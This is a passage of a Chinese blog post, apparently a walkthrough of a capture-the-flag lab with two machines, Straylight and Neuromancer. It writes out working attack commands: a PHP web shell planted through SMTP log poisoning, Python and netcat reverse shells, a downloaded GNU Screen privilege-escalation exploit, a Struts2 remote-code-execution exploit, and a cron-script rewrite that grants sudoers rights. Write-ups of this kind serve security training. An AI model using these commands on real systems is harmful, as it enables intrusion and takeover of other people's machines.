class=\"wp-block-paragraph\">\u901a\u8fc7 smtp \u5199\u5165\u65e5\u5fd7   telnet 192.168.38.238 25<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Trying 192.168.38.238...\nConnected to 192.168.38.238.\nEscape character is '^]'.\n220 straylight ESMTP Postfix (Debian\/GNU)\nhelo hack.com\n250 straylight\nmail from:hack@straylight\n250 2.1.0 Ok\nrcpt to:straylight\n550 5.1.1 &lt;straylight&gt;: Recipient address rejected: User unknown in local recipient table\nrcpt to:wintermute\n250 2.1.5 Ok\ndata \n354 End data with &lt;CR&gt;&lt;LF&gt;.&lt;CR&gt;&lt;LF&gt;\nsubjiec\uff1a&lt;?php system($_GET&#91;'a']);?&gt;\n.\n250 2.0.0 Ok: queued as 31731559D\nquit\n221 2.0.0 Bye\nConnection closed by foreign host.\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>python -c \"import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.38.107',1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(&#91;'\/bin\/bash','-i']);\"  \u4f7f\u7528python \u53cd\u5f39shell<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-18-225823-1024x430.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-18-225823-1024x430.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-447\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">nc -lvp 1234  \u6210\u529f\u83b7\u5f97shell  www-data<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u4e09\u3001\u63d0\u6743\uff08Straylight\uff09<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>www-data@straylight:\/home$ find \/ -perm \/4000 2&gt;\/dev\/null\n\/bin\/su\n\/bin\/umount\n\/bin\/mount\n\/bin\/screen-4.5.0\n\/bin\/ping\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chsh\n\/usr\/bin\/chfn\n\/usr\/bin\/passwd\n\/usr\/bin\/newgrp\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\/bin\/screen-4.5.0  \u5e94\u8be5\u662f\u53ef\u4ee5\u5229\u7528\u7684<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>searchsploit screen 4.5.0 \n---------------------------------------------------------------------------------------------\n                                                                                                                                                          \nGNU Screen 4.5.0 - Local Privilege Escalation                                                                                                                    | linux\/local\/41154.sh\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>python -m http.server 8000\nwget http:\/\/192.168.38.107:8000\/41154.sh\nchmod +x 41154.sh\n.\/41154.sh\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">getshell  \u83b7\u5f97root \u6743\u9650<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u7136\u540e\u8fdb\u5165 \u6a2a\u5411\u7684\u63d0\u6743  <\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u4e00\u3001\u4fe1\u606f\u6536\u96c6 \uff08Neuromancer\uff09<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u5185\u7f51\u4fe1\u606f\u6536\u96c6<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>root@straylight:\/root# cat note.txt \nDevs,\n\nLady 3Jane has asked us to create a custom java app on Neuromancer's primary server to help her interact w\/ the AI via a web-based GUI.\n\nThe engineering team couldn't strss enough how risky that is, opening up a Super AI to remote access on the Freeside network. It is within out internal admin network, but still, it should be off the network completely. For the sake of humanity, user access should only be allowed via the physical console...who knows what this thing can do.\n\nAnyways, we've deployed the war file on tomcat as ordered - located here:\n\n\/struts2_2.3.15.1-showcase\n\nIt's ready for the devs to customize to her liking...I'm stating the obvious, but make sure to secure this thing.\n\nRegards,\n\nBob Laugh\nTuring Systems Engineer II\nFreeside\/\/Straylight\/\/Ops5\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><br>\/struts2_2.3.15.1-showcase  \u83b7\u5f97\u4e00\u4e2a\u76ee\u5f55<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">ip a\u53ef\u4ee5\u770b\u5230\u8fd8\u6709\u4e00\u4e2a\u7f51\u6bb5\u5b58\u5728<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>root@straylight:\/etc# ip a \n1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1\n    link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n    inet 127.0.0.1\/8 scope host lo\n       valid_lft forever preferred_lft forever\n    inet6 ::1\/128 scope host \n       valid_lft forever preferred_lft forever\n2: enp0s3: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000\n    link\/ether 08:00:27:50:96:d9 brd ff:ff:ff:ff:ff:ff\n    inet 192.168.38.238\/24 brd 192.168.38.255 scope global enp0s3\n       valid_lft forever preferred_lft forever\n    inet6 2409:8950:1792:8c0:a00:27ff:fe50:96d9\/64 scope global mngtmpaddr dynamic \n       valid_lft 3407sec preferred_lft 3407sec\n    inet6 fe80::a00:27ff:fe50:96d9\/64 scope link \n       valid_lft forever preferred_lft forever                                                                                                       \n3: enp0s8: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000\n    link\/ether 08:00:27:a9:7a:f0 brd ff:ff:ff:ff:ff:ff\n    inet 192.168.56.5\/24 brd 192.168.56.255 scope global enp0s8\n       valid_lft forever preferred_lft forever\n    inet6 fe80::a00:27ff:fea9:7af0\/64 scope link \n       valid_lft forever preferred_lft forever\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u5b58\u6d3b\u4e3b\u673a\u626b\u63cf for i in $(seq 1 254); do ping -W 1 -c 1 192.168.56.$i | grep from ; done<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>root@straylight:\/etc# for i in {1..254}; do ping -c 1 -W 1 192.168.56.$i | grep from ; done \n64 bytes from 192.168.56.2: icmp_seq=1 ttl=255 time=0.194 ms\n64 bytes from 192.168.56.4: icmp_seq=1 ttl=64 time=0.351 ms\n64 bytes from 192.168.56.5: icmp_seq=1 ttl=64 time=0.018 ms\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u7aef\u53e3\u626b\u63cf   nc.traditional -vv -z 192.168.56.4 1-65535 2&gt;&amp;1 |grep -v refused<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>root@straylight:\/etc# nc.traditional -vv -z 192.168.56.4 1-65535 2&gt;&amp;1 |grep -v refused\n192.168.56.4: inverse host lookup failed: Unknown host\n(UNKNOWN) &#91;192.168.56.4] 34483 (?) open\n(UNKNOWN) &#91;192.168.56.4] 8080 (http-alt) open\n(UNKNOWN) &#91;192.168.56.4] 8009 (?) open\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u7136\u540e\u628a\u5185\u7f51\u7684\u6d41\u91cf \u8f6c\u53d1\u51fa\u6765 <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>root@straylight:\/etc# socat TCP-LISTEN:5656,fork TCP4:192.168.56.4:8080&amp;\n&#91;1] 25705\nroot@straylight:\/etc# socat TCP-LISTEN:5655,fork TCP4:192.168.56.4:8009&amp;\n&#91;2] 25742\nroot@straylight:\/etc# socat TCP-LISTEN:5555,fork TCP4:192.168.56.4:34483&amp;\n&#91;3] 25761\n\nroot@straylight:\/root# socat TCP-LISTEN:1234,fork TCP4:192.168.38.107:1234&amp;\n&#91;4] 26616\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u5728kali\u8fdb\u884c\u6e17\u900f<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo nmap -sC -sV -p 5656,5655,5555 192.168.38.238\n&#91;sudo] password for user: \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-05-18 15:32 CST\nNmap scan report for 192.168.38.238\nHost is up (0.00030s latency).\n\nPORT     STATE SERVICE VERSION\n5555\/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 2e:9b:4a:a9:c0:fc:0b:d8:ef:f1:e3:9d:f4:59:25:32 (RSA)\n|   256 f6:2a:de:07:36:36:00:e9:b5:5d:2f:aa:03:79:91:d1 (ECDSA)\n|_  256 38:3c:a8:ed:91:ea:ce:1d:0d:0f:ab:51:ac:97:c8:fb (ED25519)\n5655\/tcp open  unknown\n5656\/tcp open  http    Apache Tomcat 9.0.0.M26\n|_http-title: Apache Tomcat\/9.0.0.M26\n|_http-favicon: Apache Tomcat\nMAC Address: 08:00:27:50:96:D9 (Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 12.18 seconds\n                                                             <\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">5555   tomcat 9.0  \u7f51\u9875\u670d\u52a1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">5655   Apache Tomcat 9.0.0.M26  \u7684\u914d\u5957\u670d\u52a1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">5555  ssh \u670d\u52a1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">tomcat 9.0 \u6709\u4e2a\u9e21\u808b\u7684\u6587\u4ef6\u5305\u542b  \u53ea\u80fd\u5305\u542btomat  webapp\u76ee\u5f55 \u4e0b\u7684\u6587\u4ef6<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python2.7 CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.38.238 -p 5655 -f \/WEB-INF\/web.xml\nGetting resource at ajp13:\/\/192.168.38.238:5655\/asdf\n----------------------------\n&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;\n&lt;!--\n Licensed to the Apache Software Foundation (ASF) under one or more\n  contributor license agreements.  See the NOTICE file distributed with\n  this work for additional information regarding copyright ownership.\n  The ASF licenses this file to You under the Apache License, Version 2.0\n  (the \"License\"); you may not use this file except in compliance with\n  the License.  You may obtain a copy of the License at\n\n      http:&#47;&#47;www.apache.org\/licenses\/LICENSE-2.0\n\n  Unless required by applicable law or agreed to in writing, software\n  distributed under the License is distributed on an \"AS IS\" BASIS,\n  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n  See the License for the specific language governing permissions and\n  limitations under the License.\n--&gt;\n&lt;web-app xmlns=\"http:\/\/xmlns.jcp.org\/xml\/ns\/javaee\"\n  xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n  xsi:schemaLocation=\"http:\/\/xmlns.jcp.org\/xml\/ns\/javaee\n                      http:\/\/xmlns.jcp.org\/xml\/ns\/javaee\/web-app_4_0.xsd\"\n  version=\"4.0\"\n  metadata-complete=\"true\"&gt;\n\n  &lt;display-name&gt;Welcome to Tomcat&lt;\/display-name&gt;\n  &lt;description&gt;\n     Welcome to Tomcat\n  &lt;\/description&gt;\n\n&lt;\/web-app&gt;\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bbf\u95ee  http:\/\/192.168.38.238:5656\/struts2_2.3.15.1-showcase<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-18-233410-1024x586.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/05\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-05-18-233410-1024x586.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-452\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u5f97\u77e5\u6709\u4e2a\u6846\u67b6  struts2  \u5b58\u5728\u7f51\u9875\u670d\u52a1\u4e2d       \u7248\u672c\u4e3a2.3.15<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>searchsploit struts  Remote Code Execution\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\n Exploit Title                                                                                                                                                           |  Path\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nApache Struts - 'ParametersInterceptor' Remote Code Execution (Metasploit)                                                                                               | multiple\/remote\/24874.rb\nApache Struts - ClassLoader Manipulation Remote Code Execution (Metasploit)                                                                                              | multiple\/remote\/33142.rb\nApache Struts - Dynamic Method Invocation Remote Code Execution (Metasploit)                                                                                             | linux\/remote\/39756.rb\nApache Struts - includeParams Remote Code Execution (Metasploit)                                                                                                         | multiple\/remote\/25980.rb\nApache Struts - REST Plugin With Dynamic Method Invocation Remote Code Execution                                                                                         | multiple\/remote\/43382.py\nApache Struts - REST Plugin With Dynamic Method Invocation Remote Code Execution (Metasploit)                                                                            | multiple\/remote\/39919.rb\nApache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution (Metasploit)                                                                                          | multiple\/remote\/27135.rb\nApache Struts 2 - Skill Name Remote Code Execution                                                                                                                       | multiple\/remote\/37647.txt\nApache Struts 2 - Struts 1 Plugin Showcase OGNL Code Execution (Metasploit)                                                                                              | multiple\/remote\/44643.rb\nApache Struts 2 - Struts 1 Plugin Showcase OGNL Code Execution (Metasploit)                                                                                              | multiple\/remote\/44643.rb\nApache Struts 2.0.1 &lt; 2.3.33 \/ 2.5 &lt; 2.5.10 - Arbitrary Code Execution                                                                                                   | multiple\/remote\/44556.py\nApache Struts 2.3 &lt; 2.3.34 \/ 2.5 &lt; 2.5.16 - Remote Code Execution (1)                                                                                                    | linux\/remote\/45260.py\nApache Struts 2.3 &lt; 2.3.34 \/ 2.5 &lt; 2.5.16 - Remote Code Execution (2)                                                                                                    | multiple\/remote\/45262.py\nApache Struts 2.3.5 &lt; 2.3.31 \/ 2.5 &lt; 2.5.10 - Remote Code Execution                                                                                                      | linux\/webapps\/41570.py\nApache Struts 2.3.x Showcase - Remote Code Execution                                                                                                                     | multiple\/webapps\/42324.py\nApache Struts 2.5 &lt; 2.5.12 - REST Plugin XStream Remote Code Execution                                                                                                   | linux\/remote\/42627.py\nApache Struts &lt; 1.3.10 \/ &lt; 2.3.16.2 - ClassLoader Manipulation Remote Code Execution (Metasploit)                                                                        | multiple\/remote\/41690.rb\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nShellcodes: No Results\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>searchsploit struts 2.3  Remote Code Execution\n\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\n Exploit Title                                                                                                                                                           |  Path\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nApache Struts 2.0.1 &lt; 2.3.33 \/ 2.5 &lt; 2.5.10 - Arbitrary Code Execution                                                                                                   | multiple\/remote\/44556.py\nApache Struts 2.3 &lt; 2.3.34 \/ 2.5 &lt; 2.5.16 - Remote Code Execution (1)                                                                                                    | linux\/remote\/45260.py\nApache Struts 2.3 &lt; 2.3.34 \/ 2.5 &lt; 2.5.16 - Remote Code Execution (2)                                                                                                    | multiple\/remote\/45262.py\nApache Struts 2.3.5 &lt; 2.3.31 \/ 2.5 &lt; 2.5.10 - Remote Code Execution                                                                                                      | linux\/webapps\/41570.py\nApache Struts 2.3.x Showcase - Remote Code Execution                                                                                                                     | multiple\/webapps\/42324.py\nApache Struts &lt; 1.3.10 \/ &lt; 2.3.16.2 - ClassLoader Manipulation Remote Code Execution (Metasploit)                                                                        | multiple\/remote\/41690.rb\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nShellcodes: No Results\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Apache Struts 2.3.5 &lt; 2.3.31 \/ 2.5 &lt; 2.5.10 - Remote Code Execution                                                                                                      | linux\/webapps\/41570.py\npython2.7  41570.py  http:\/\/10.5.160.11:5656\/struts2_2.3.15.1-showcase\/ id\n&#91;*] CVE: 2017-5638 - Apache Struts2 S2-045\n&#91;*] cmd: id\n\nuid=1000(ta) gid=1000(ta) groups=1000(ta),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)\n<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u4e8c\u3001\u83b7\u5f97\u7acb\u8db3\u70b9<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"> \u901a\u8fc7 \u7aef\u53e3\u8f6c\u53d1  \u628a\u6d41\u91cf\u8f6c\u53d1\u5230  kali   \u7136\u540e\u547d\u4ee4\u6267\u884c\u53cd\u5f39shell<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code> root@straylight:\/root# socat TCP-LISTEN:1234,fork TCP4:192.168.38.107:1234&amp;\n&#91;4] 26616\npython struts-pwn.py -u  http:\/\/192.168.38.238:5656\/struts2_2.3.15.1-showcase\/ -c \"rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2&gt;&amp;1|nc 192.168.56.5 1234 &gt;\/tmp\/f\"\nnc -lvp 1234<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">getshell  \u767b\u9646ta<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u4e09\u3001\u63d0\u6743<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>cat \/usr\/local\/tomcat\/conf\/tomcat-users.xml\n&lt;user username=\"Lady3Jane\" password=\"&amp;gt;&amp;#33;&amp;#88;&amp;#120;&amp;#51;&amp;#74;&amp;#97;&amp;#110;&amp;#101;&amp;#120;&amp;#88;&amp;#33;&amp;lt;\" roles=\"manager-gui\"\/&gt;\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>ta@neuromancer:\/home\/lady3jane$ su lady3jane\nlady3jane@neuromancer:~$ sudo -l\n&#91;sudo] password for lady3jane: \nSorry, user lady3jane may not run sudo on neuromancer.\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>lady3jane@neuromancer:~$ ls -al\ntotal 32\ndrwxr-xr-x 3 lady3jane lady3jane 4096 Jul  1  2018 .\ndrwxr-xr-x 4 root      root      4096 Jul  1  2018 ..\n-rw------- 1 lady3jane lady3jane   30 Jul  3  2018 .bash_history\n-rw-r--r-- 1 lady3jane lady3jane  220 Jul  1  2018 .bash_logout\n-rw-r--r-- 1 lady3jane lady3jane 3771 Jul  1  2018 .bashrc\ndrwx------ 2 lady3jane lady3jane 4096 Jul  1  2018 .cache\n-rwxr-x--- 1 lady3jane lady3jane  440 Jul  1  2018 custom-tomcat-chk.sh\n-rw-r--r-- 1 lady3jane lady3jane  655 Jul  1  2018 .profile\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u5148\u628apspy64  \u4f20\u5230  Straylight  \u7136\u540e\u518d\u4e0b\u8f7d\u5230neuromancer<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>lady3jane@neuromancer:\/tmp$ wget http:\/\/192.168.56.5:7777\/pspy64 \nlady3jane@neuromancer:\/tmp$ chmod +x pspy64\nlady3jane@neuromancer:\/tmp$ .\/pspy64 -i 1000 -p\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528pspy64 \u67e5\u770b\u8fdb\u7a0b\u4fe1\u606f  root  \u6709\u4e00\u4e2a \u5b9a\u65f6\u4efb\u52a1<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>2024\/05\/18 04:36:01 CMD: UID=0     PID=2533   | \/bin\/bash \/home\/lady3jane\/server-check.sh \n2024\/05\/18 04:36:01 CMD: UID=0     PID=2532   | \/bin\/sh -c \/bin\/bash \/home\/lady3jane\/server-check.sh \n2024\/05\/18 04:36:01 CMD: UID=0     PID=2531   | \/usr\/sbin\/CRON -f \n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>lady3jane@neuromancer:~$ mv custom-tomcat-chk.sh  \/home\/lady3jane\/server-check&gt;\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u5b9a\u65f6\u4efb\u52a1\u7684\u6587\u4ef6\u540d\u548c\u5b58\u5728\u7684\u4e0d\u4e00\u6837 \u4fee\u6539\u6210\u4e00\u6837  \u7136\u540e\u91cd\u65b0\u5199\u5165<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>lady3jane@neuromancer:~$ vim server-check.sh \n\n#!\/bin\/bash\n# ..the AI tells me it can maintain security, server health, etc w\/o forced inte\nrvention,\n# but I beg to differ...hence the cron script.\ncp \/bin\/bash \/home\/lady3jane\/rootbash\nchmod +xs \/home\/lady3jane\/rootbash\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">2. <strong>\u6587\u4ef6\u7cfb\u7edf\u6302\u8f7d\u9009\u9879<\/strong><\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u67d0\u4e9b\u6587\u4ef6\u7cfb\u7edf\u6302\u8f7d\u9009\u9879\uff08\u5982 <code>nosuid<\/code>\uff09\u4f1a\u7981\u6b62 SetUID \u4f4d\u751f\u6548\u3002\u5982\u679c <code>\/tmp<\/code> \u6216\u5305\u542b <code>\/tmp<\/code> \u7684\u6587\u4ef6\u7cfb\u7edf\u662f\u4ee5 <code>nosuid<\/code> \u9009\u9879\u6302\u8f7d\u7684\uff0c\u5219 SetUID \u4f4d\u4e0d\u4f1a\u751f\u6548\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f60\u53ef\u4ee5\u901a\u8fc7\u4ee5\u4e0b\u547d\u4ee4\u68c0\u67e5 <code>\/tmp<\/code> \u7684\u6302\u8f7d\u9009\u9879\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>lady3jane@neuromancer:~$ vim server-check.sh \n\n\n\n#!\/bin\/bash\n# ..the AI tells me it can maintain security, server health, etc w\/o forced inte\nrvention,\n# but I beg to differ...hence the cron script.\necho \" lady3jane ALL=(ALL) NOPASSWD: ALL\" &gt;&gt; \/etc\/sudoers\necho \"ok\" &gt;&gt;\/home\/lady3jane\/ok<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>lady3jane@neuromancer:~$ sudo -l\nMatching Defaults entries for lady3jane on neuromancer:\nenv_reset, mail_badpass,\nsecure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser lady3jane may run the following commands on neuromancer:\n(ALL) NOPASSWD: ALL\n\nsudo su<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u63d0\u6743\u6210\u529f   root<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u4e24\u4e2a\u673a\u5668 Straylight Neuromancer Straylight &#8211; simulate [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[28,54,55,72,74,78,91,96,109],"class_list":["post-439","post","type-post","status-publish","format-standard","hentry","category-target-aircraft","tag-echo-sudoers","tag-nosuid","tag-ntop-","tag-python-sehll","tag-rm-nc-shell","tag-smtp-","tag-struts2-exploit","tag-tomcat-9-0-","tag-109"],"_links":{"self":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/439","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=439"}],"version-history":[{"count":0,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/439\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=439"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=439"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=439"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}